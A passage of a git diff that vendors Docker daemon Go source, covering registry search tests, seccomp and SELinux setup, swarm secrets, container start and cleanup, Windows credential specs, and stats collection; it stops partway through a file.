filtersArgs: `{"is-official":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + }, + { + filtersArgs: `{"is-official":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: true, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-official":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: false, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsOfficial: false, + }, + }, + }, + { + filtersArgs: `{"stars":{"0":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + }, + { + filtersArgs: `{"stars":{"1":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + StarCount: 0, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"stars":{"1":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name0", + Description: "description0", + StarCount: 0, + }, + { + Name: "name1", + Description: "description1", + StarCount: 1, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name1", + Description: "description1", + StarCount: 1, + }, + }, + }, + { + filtersArgs: `{"stars":{"1":true}, "is-official":{"true":true}, "is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name0", + Description: "description0", + StarCount: 0, + IsOfficial: true, + IsAutomated: true, + }, + { + Name: "name1", + Description: "description1", + StarCount: 1, + IsOfficial: false, + IsAutomated: true, + }, + { + Name: "name2", + Description: "description2", + StarCount: 1, + IsOfficial: true, + IsAutomated: false, + }, + { + Name: "name3", + Description: "description3", + StarCount: 2, + IsOfficial: true, + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name3", + Description: "description3", + StarCount: 2, + IsOfficial: true, + IsAutomated: true, + }, + }, + }, + } + for index, s := range successCases { + daemon := &Daemon{ + RegistryService: &FakeService{ + term: term, + results: s.registryResults, + }, + } + results, err := daemon.SearchRegistryForImages(context.Background(), s.filtersArgs, term, 25, nil, map[string][]string{}) + if err != nil { + t.Errorf("%d: %v", index, err) + } + if results.Query != term { + t.Errorf("%d: expected Query to be %s, got %s", index, term, results.Query) + } + if results.NumResults != len(s.expectedResults) { + t.Errorf("%d: expected NumResults to be %d, got %d", index, len(s.expectedResults), results.NumResults) + } + for _, result := range results.Results { + found := false + for _, expectedResult := range s.expectedResults { + if expectedResult.Name == result.Name && + expectedResult.Description == result.Description && + expectedResult.IsAutomated == result.IsAutomated && + expectedResult.IsOfficial == result.IsOfficial && + expectedResult.StarCount == result.StarCount { + found = true + break + } + } + if !found { + t.Errorf("%d: expected results %v, got %v", index, s.expectedResults, results.Results) + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go new file mode 100644 index 0000000000..ff1127b6c2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go @@ -0,0 +1,19 @@ +// +build linux,!seccomp + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/opencontainers/runtime-spec/specs-go" +) + +var supportsSeccomp = false + +func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { + if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" { + return fmt.Errorf("seccomp profiles are not supported on this daemon, you cannot specify a custom seccomp profile") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go new file mode 100644 index 0000000000..7f16733d95 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/seccomp_linux.go @@ -0,0 +1,55 @@ +// +build linux,seccomp + +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/profiles/seccomp" + "github.com/opencontainers/runtime-spec/specs-go" +) + +var supportsSeccomp = true + +func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { + var profile *specs.Seccomp + var err error + + if c.HostConfig.Privileged { + return nil + } + + if !daemon.seccompEnabled { + if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" { + return fmt.Errorf("Seccomp is not enabled in your kernel, cannot run a custom seccomp profile.") + } + logrus.Warn("Seccomp is not enabled in your kernel, running container without default profile.") + c.SeccompProfile = "unconfined" + } + if c.SeccompProfile == "unconfined" { + return nil + } + if c.SeccompProfile != "" { + profile, err = seccomp.LoadProfile(c.SeccompProfile, rs) + if err != nil { + return err + } + } else { + if daemon.seccompProfile != nil { + profile, err = seccomp.LoadProfile(string(daemon.seccompProfile), rs) + if err != nil { + return err + } + } else { + profile, err = seccomp.GetDefaultProfile(rs) + if err != nil { + return err + } + } + } + + rs.Linux.Seccomp = profile + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go new file mode 100644 index 0000000000..b3691e96af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go @@ -0,0 +1,5 @@ +// +build !linux + +package daemon + +var supportsSeccomp = false diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go new file mode 100644 index 0000000000..355cb1e139 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets.go @@ -0,0 +1,36 @@ +package daemon + +import ( + "github.com/Sirupsen/logrus" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/swarmkit/agent/exec" +) + +// SetContainerSecretStore sets the secret store backend for the container +func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error { + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.SecretStore = store + + return nil +} + +// SetContainerSecretReferences sets the container secret references needed +func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error { + if !secretsSupported() && len(refs) > 0 { + logrus.Warn("secrets are not supported on this platform") + return nil + } + + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.SecretReferences = refs + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go new file mode 100644 index 0000000000..fca4e12598 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go @@ -0,0 +1,7 @@ +// +build linux + +package daemon + +func secretsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go new file mode 100644 index 0000000000..d6f36fda1e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux + +package daemon + +func secretsSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go new file mode 100644 index 0000000000..83a3447111 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go @@ -0,0 +1,17 @@ +// +build linux + +package daemon + +import "github.com/opencontainers/runc/libcontainer/selinux" + +func selinuxSetDisabled() { + selinux.SetDisabled() +} + +func selinuxFreeLxcContexts(label string) { + selinux.FreeLxcContexts(label) +} + +func selinuxEnabled() bool { + return selinux.SelinuxEnabled() +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go new file mode 100644 index 0000000000..25a56ad157 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go @@ -0,0 +1,13 @@ +// +build !linux + +package daemon + +func selinuxSetDisabled() { +} + +func selinuxFreeLxcContexts(label string) { +} + +func selinuxEnabled() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go new file mode 100644 index 0000000000..6c94fd5482 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start.go @@ -0,0 +1,230 @@ +package daemon + +import ( + "fmt" + "net/http" + "runtime" + "strings" + "syscall" + "time" + + "google.golang.org/grpc" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/runconfig" +) + +// ContainerStart starts a container. +func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error { + if checkpoint != "" && !daemon.HasExperimental() { + return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode")) + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if container.IsPaused() { + return fmt.Errorf("Cannot start a paused container, try unpause instead.") + } + + if container.IsRunning() { + err := fmt.Errorf("Container already started") + return apierrors.NewErrorWithStatusCode(err, http.StatusNotModified) + } + + // Windows does not have the backwards compatibility issue here. + if runtime.GOOS != "windows" { + // This is kept for backward compatibility - hostconfig should be passed when + // creating a container, not during start. + if hostConfig != nil { + logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12") + oldNetworkMode := container.HostConfig.NetworkMode + if err := daemon.setSecurityOptions(container, hostConfig); err != nil { + return err + } + if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil { + return err + } + if err := daemon.setHostConfig(container, hostConfig); err != nil { + return err + } + newNetworkMode := container.HostConfig.NetworkMode + if string(oldNetworkMode) != string(newNetworkMode) { + // if user has change the network mode on starting, clean up the + // old networks. It is a deprecated feature and has been removed in Docker 1.12 + container.NetworkSettings.Networks = nil + if err := container.ToDisk(); err != nil { + return err + } + } + container.InitDNSHostConfig() + } + } else { + if hostConfig != nil { + return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create") + } + } + + // check if hostConfig is in line with the current system settings. + // It may happen cgroups are umounted or the like. + if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil { + return err + } + // Adapt for old containers in case we have updates in this function and + // old containers never have chance to call the new function in create stage. + if hostConfig != nil { + if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil { + return err + } + } + + return daemon.containerStart(container, checkpoint, checkpointDir, true) +} + +// Start starts a container +func (daemon *Daemon) Start(container *container.Container) error { + return daemon.containerStart(container, "", "", true) +} + +// containerStart prepares the container to run by setting up everything the +// container needs, such as storage and networking, as well as links +// between containers. The container is left waiting for a signal to +// begin running. +func (daemon *Daemon) containerStart(container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (err error) { + start := time.Now() + container.Lock() + defer container.Unlock() + + if resetRestartManager && container.Running { // skip this check if already in restarting step and resetRestartManager==false + return nil + } + + if container.RemovalInProgress || container.Dead { + return fmt.Errorf("Container is marked for removal and cannot be started.") + } + + // if we encounter an error during start we need to ensure that any other + // setup has been cleaned up properly + defer func() { + if err != nil { + container.SetError(err) + // if no one else has set it, make sure we don't leave it at zero + if container.ExitCode() == 0 { + container.SetExitCode(128) + } + container.ToDisk() + + container.Reset(false) + + daemon.Cleanup(container) + // if containers AutoRemove flag is set, remove it after clean up + if container.HostConfig.AutoRemove { + container.Unlock() + if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("can't remove container %s: %v", container.ID, err) + } + container.Lock() + } + } + }() + + if err := daemon.conditionalMountOnStart(container); err != nil { + return err + } + + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards API compatibility. + container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + + if err := daemon.initializeNetworking(container); err != nil { + return err + } + + spec, err := daemon.createSpec(container) + if err != nil { + return err + } + + createOptions, err := daemon.getLibcontainerdCreateOptions(container) + if err != nil { + return err + } + + if resetRestartManager { + container.ResetRestartManager(true) + } + + if checkpointDir == "" { + checkpointDir = container.CheckpointDir() + } + + if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil { + errDesc := grpc.ErrorDesc(err) + contains := func(s1, s2 string) bool { + return strings.Contains(strings.ToLower(s1), s2) + } + logrus.Errorf("Create container failed with error: %s", errDesc) + // if we receive an internal error from the initial start of a container then lets + // return it instead of entering the restart loop + // set to 127 for container cmd not found/does not exist) + if contains(errDesc, container.Path) && + (contains(errDesc, "executable file not found") || + contains(errDesc, "no such file or directory") || + contains(errDesc, "system cannot find the file specified")) { + container.SetExitCode(127) + } + // set to 126 for container cmd can't be invoked errors + if contains(errDesc, syscall.EACCES.Error()) { + container.SetExitCode(126) + } + + // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts + if contains(errDesc, syscall.ENOTDIR.Error()) { + errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type" + container.SetExitCode(127) + } + + return fmt.Errorf("%s", errDesc) + } + + containerActions.WithValues("start").UpdateSince(start) + + return nil +} + +// Cleanup releases any network resources allocated to the container along with any rules +// around how containers are linked together. It also unmounts the container's root filesystem. +func (daemon *Daemon) Cleanup(container *container.Container) { + daemon.releaseNetwork(container) + + container.UnmountIpcMounts(detachMounted) + + if err := daemon.conditionalUnmountOnCleanup(container); err != nil { + // FIXME: remove once reference counting for graphdrivers has been refactored + // Ensure that all the mounts are gone + if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil { + daemon.cleanupMountsByID(mountid) + } + } + + if err := container.UnmountSecrets(); err != nil { + logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err) + } + + for _, eConfig := range container.ExecCommands.Commands() { + daemon.unregisterExecCommand(container, eConfig) + } + + if container.BaseFS != "" { + if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil { + logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err) + } + } + container.CancelAttachContext() +} diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go b/vendor/github.com/docker/docker/daemon/start_unix.go new file mode 100644 index 0000000000..6bbe485075 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start_unix.go @@ -0,0 +1,31 @@ +// +build !windows + +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" + "github.com/docker/docker/libcontainerd" +) + +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { + createOptions := []libcontainerd.CreateOption{} + + // Ensure a runtime has been assigned to this container + if container.HostConfig.Runtime == "" { + container.HostConfig.Runtime = stockRuntimeName + container.ToDisk() + } + + rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime) + if rt == nil { + return nil, fmt.Errorf("no such runtime '%s'", container.HostConfig.Runtime) + } + if UsingSystemd(daemon.configStore) { + rt.Args = append(rt.Args, "--systemd-cgroup=true") + } + createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args)) + + return createOptions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go new file mode 100644 index 0000000000..faa7575224 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/start_windows.go @@ -0,0 +1,205 @@ +package daemon + +import ( + "fmt" + "io/ioutil" + "path/filepath" + "strings" + + "github.com/docker/docker/container" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "golang.org/x/sys/windows/registry" +) + +const ( + credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` + credentialSpecFileLocation = "CredentialSpecs" +) + +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { + createOptions := []libcontainerd.CreateOption{} + + // Are we going to run as a Hyper-V container? + hvOpts := &libcontainerd.HyperVIsolationOption{} + if container.HostConfig.Isolation.IsDefault() { + // Container is set to use the default, so take the default from the daemon configuration + hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container is requesting an isolation mode. Honour it. + hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV() + } + + // Generate the layer folder of the layer options + layerOpts := &libcontainerd.LayerOption{} + m, err := container.RWLayer.Metadata() + if err != nil { + return nil, fmt.Errorf("failed to get layer metadata - %s", err) + } + if hvOpts.IsHyperV { + hvOpts.SandboxPath = filepath.Dir(m["dir"]) + } + + layerOpts.LayerFolderPath = m["dir"] + + // Generate the layer paths of the layer options + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err) + } + // Get the layer path for each layer. + max := len(img.RootFS.DiffIDs) + for i := 1; i <= max; i++ { + img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i] + layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID()) + if err != nil { + return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err) + } + // Reverse order, expecting parent most first + layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...) + } + + // Get endpoints for the libnetwork allocated networks to the container + var epList []string + AllowUnqualifiedDNSQuery := false + gwHNSID := "" + if container.NetworkSettings != nil { + for n := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := container.GetEndpointInNetwork(sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + gwHNSID = gwInfo["hnsid"].(string) + } + } + + if data["hnsid"] != nil { + epList = append(epList, data["hnsid"].(string)) + } + + if data["AllowUnqualifiedDNSQuery"] != nil { + AllowUnqualifiedDNSQuery = true + } + } + } + + if gwHNSID != "" { + epList = append(epList, gwHNSID) + } + + // Read and add credentials from the security options if a credential spec has been provided. + if container.HostConfig.SecurityOpt != nil { + for _, sOpt := range container.HostConfig.SecurityOpt { + sOpt = strings.ToLower(sOpt) + if !strings.Contains(sOpt, "=") { + return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) + } + var splitsOpt []string + splitsOpt = strings.SplitN(sOpt, "=", 2) + if len(splitsOpt) != 2 { + return nil, fmt.Errorf("invalid security option: %s", sOpt) + } + if splitsOpt[0] != "credentialspec" { + return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0]) + } + + credentialsOpts := &libcontainerd.CredentialsOption{} + var ( + match bool + csValue string + err error + ) + if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { + if csValue == "" { + return nil, fmt.Errorf("no value supplied for file:// credential spec security option") + } + if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil { + return nil, err + } + } else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match { + if csValue == "" { + return nil, fmt.Errorf("no value supplied for registry:// credential spec security option") + } + if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil { + return nil, err + } + } else { + return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") + } + createOptions = append(createOptions, credentialsOpts) + } + } + + // Now add the remaining options. + createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore}) + createOptions = append(createOptions, hvOpts) + createOptions = append(createOptions, layerOpts) + if epList != nil { + createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery}) + } + + return createOptions, nil +} + +// getCredentialSpec is a helper function to get the value of a credential spec supplied +// on the CLI, stripping the prefix +func getCredentialSpec(prefix, value string) (bool, string) { + if strings.HasPrefix(value, prefix) { + return true, strings.TrimPrefix(value, prefix) + } + return false, "" +} + +// readCredentialSpecRegistry is a helper function to read a credential spec from +// the registry. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecRegistry(id, name string) (string, error) { + var ( + k registry.Key + err error + val string + ) + if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { + return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) + } + if val, _, err = k.GetStringValue(name); err != nil { + if err == registry.ErrNotExist { + return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) + } + return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) + } + return val, nil +} + +// readCredentialSpecFile is a helper function to read a credential spec from +// a file. If not found, we return an empty string and warn in the log. +// This allows for staging on machines which do not have the necessary components. +func readCredentialSpecFile(id, root, location string) (string, error) { + if filepath.IsAbs(location) { + return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") + } + base := filepath.Join(root, credentialSpecFileLocation) + full := filepath.Join(base, location) + if !strings.HasPrefix(full, base) { + return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) + } + bcontents, err := ioutil.ReadFile(full) + if err != nil { + return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) + } + return string(bcontents[:]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go new file mode 100644 index 0000000000..51f5962d17 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats.go @@ -0,0 +1,158 @@ +package daemon + +import ( + "encoding/json" + "errors" + "fmt" + "runtime" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/ioutils" +) + +// ContainerStats writes information about the container to the stream +// given in the config object. +func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error { + if runtime.GOOS == "solaris" { + return fmt.Errorf("%+v does not support stats", runtime.GOOS) + } + // Engine API version (used for backwards compatibility) + apiVersion := config.Version + + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + + // If the container is either not running or restarting and requires no stream, return an empty stats. + if (!container.IsRunning() || container.IsRestarting()) && !config.Stream { + return json.NewEncoder(config.OutStream).Encode(&types.Stats{}) + } + + outStream := config.OutStream + if config.Stream { + wf := ioutils.NewWriteFlusher(outStream) + defer wf.Close() + wf.Flush() + outStream = wf + } + + var preCPUStats types.CPUStats + var preRead time.Time + getStatJSON := func(v interface{}) *types.StatsJSON { + ss := v.(types.StatsJSON) + ss.Name = container.Name + ss.ID = container.ID + ss.PreCPUStats = preCPUStats + ss.PreRead = preRead + preCPUStats = ss.CPUStats + preRead = ss.Read + return &ss + } + + enc := json.NewEncoder(outStream) + + updates := daemon.subscribeToContainerStats(container) + defer daemon.unsubscribeToContainerStats(container, updates) + + noStreamFirstFrame := true + for { + select { + case v, ok := <-updates: + if !ok { + return nil + } + + var statsJSON interface{} + statsJSONPost120 := getStatJSON(v) + if versions.LessThan(apiVersion, "1.21") { + if runtime.GOOS == "windows" { + return errors.New("API versions pre v1.21 do not support stats on Windows") + } + var ( + rxBytes uint64 + rxPackets uint64 + rxErrors uint64 + rxDropped uint64 + txBytes uint64 + txPackets uint64 + txErrors uint64 + txDropped uint64 + ) + for _, v := range statsJSONPost120.Networks { + rxBytes += v.RxBytes + rxPackets += v.RxPackets + rxErrors += v.RxErrors + rxDropped += v.RxDropped + txBytes += v.TxBytes + txPackets += v.TxPackets + txErrors += v.TxErrors + txDropped += v.TxDropped + } + statsJSON = &v1p20.StatsJSON{ + Stats: statsJSONPost120.Stats, + Network: types.NetworkStats{ + RxBytes: rxBytes, + RxPackets: rxPackets, + RxErrors: rxErrors, + RxDropped: rxDropped, + TxBytes: txBytes, + TxPackets: txPackets, + TxErrors: txErrors, + TxDropped: txDropped, + }, + } + } else { + statsJSON = statsJSONPost120 + } + + if !config.Stream && noStreamFirstFrame { + // prime the cpu stats so they aren't 0 in the final output + noStreamFirstFrame = false + continue + } + + if err := enc.Encode(statsJSON); err != nil { + return err + } + + if !config.Stream { + return nil + } + case <-ctx.Done(): + return nil + } + } +} + +func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} { + return daemon.statsCollector.collect(c) +} + +func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) { + daemon.statsCollector.unsubscribe(c, ch) +} + +// GetContainerStats collects all the stats published by a container +func (daemon *Daemon) GetContainerStats(container *container.Container) (*types.StatsJSON, error) { + stats, err := daemon.stats(container) + if err != nil { + return nil, err + } + + // We already have the network stats on Windows directly from HCS. + if !container.Config.NetworkDisabled && runtime.GOOS != "windows" { + if stats.Networks, err = daemon.getNetworkStats(container); err != nil { + return nil, err + } + } + + return stats, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go new file mode 100644 index 0000000000..dc6825e705 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector.go @@ -0,0 +1,132 @@ +// +build !solaris + +package daemon + +import ( + "bufio" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/pubsub" +) + +type statsSupervisor interface { + // GetContainerStats collects all the stats related to a container + GetContainerStats(container *container.Container) (*types.StatsJSON, error) +} + +// newStatsCollector returns a new statsCollector that collections +// stats for a registered container at the specified interval. +// The collector allows non-running containers to be added +// and will start processing stats when they are started. +func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { + s := &statsCollector{ + interval: interval, + supervisor: daemon, + publishers: make(map[*container.Container]*pubsub.Publisher), + bufReader: bufio.NewReaderSize(nil, 128), + } + platformNewStatsCollector(s) + go s.run() + return s +} + +// statsCollector manages and provides container resource stats +type statsCollector struct { + m sync.Mutex + supervisor statsSupervisor + interval time.Duration + publishers map[*container.Container]*pubsub.Publisher + bufReader *bufio.Reader + + // The following fields are not set on Windows currently. + clockTicksPerSecond uint64 + machineMemory uint64 +} + +// collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *statsCollector) collect(c *container.Container) chan interface{} { + s.m.Lock() + defer s.m.Unlock() + publisher, exists := s.publishers[c] + if !exists { + publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) + s.publishers[c] = publisher + } + return publisher.Subscribe() +} + +// stopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *statsCollector) stopCollection(c *container.Container) { + s.m.Lock() + if publisher, exists := s.publishers[c]; exists { + publisher.Close() + delete(s.publishers, c) + } + s.m.Unlock() +} + +// unsubscribe removes a specific subscriber from receiving updates for a container's stats. +func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { + s.m.Lock() + publisher := s.publishers[c] + if publisher != nil { + publisher.Evict(ch) + if publisher.Len() == 0 { + delete(s.publishers, c) + } + } + s.m.Unlock() +} + +func (s *statsCollector) run() { + type publishersPair struct { + container *container.Container + publisher *pubsub.Publisher + } + // we cannot determine the capacity here. + // it will grow enough in first iteration + var pairs []publishersPair + + for range time.Tick(s.interval) { + // it does not make sense in the first iteration, + // but saves allocations in further iterations + pairs = pairs[:0] + + s.m.Lock() + for container, publisher := range s.publishers { + // copy pointers here to release the lock ASAP + pairs = append(pairs, publishersPair{container, publisher}) + } + s.m.Unlock() + if len(pairs) == 0 { + continue + } + + systemUsage, err := s.getSystemCPUUsage() + if err != nil { + logrus.Errorf("collecting system cpu usage: %v", err) + continue + } + + for _, pair := range pairs { + stats, err := s.supervisor.GetContainerStats(pair.container) + if err != nil { + if _, ok := err.(errNotRunning); !ok { + logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) + } + continue + } + // FIXME: move to containerd on Linux (not Windows) + stats.CPUStats.SystemUsage = systemUsage + + pair.publisher.Publish(*stats) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go new file mode 100644 index 0000000000..9cf9f0a94e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go @@ -0,0 +1,34 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "time" +) + +// newStatsCollector returns a new statsCollector for collection stats +// for a registered container at the specified interval. The collector allows +// non-running containers to be added and will start processing stats when +// they are started. +func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { + return &statsCollector{} +} + +// statsCollector manages and provides container resource stats +type statsCollector struct { +} + +// collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *statsCollector) collect(c *container.Container) chan interface{} { + return nil +} + +// stopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *statsCollector) stopCollection(c *container.Container) { +} + +// unsubscribe removes a specific subscriber from receiving updates for a container's stats. +func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go new file mode 100644 index 0000000000..0fcc9c5828 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go @@ -0,0 +1,71 @@ +// +build !windows,!solaris + +package daemon + +import ( + "fmt" + "os" + "strconv" + "strings" + + sysinfo 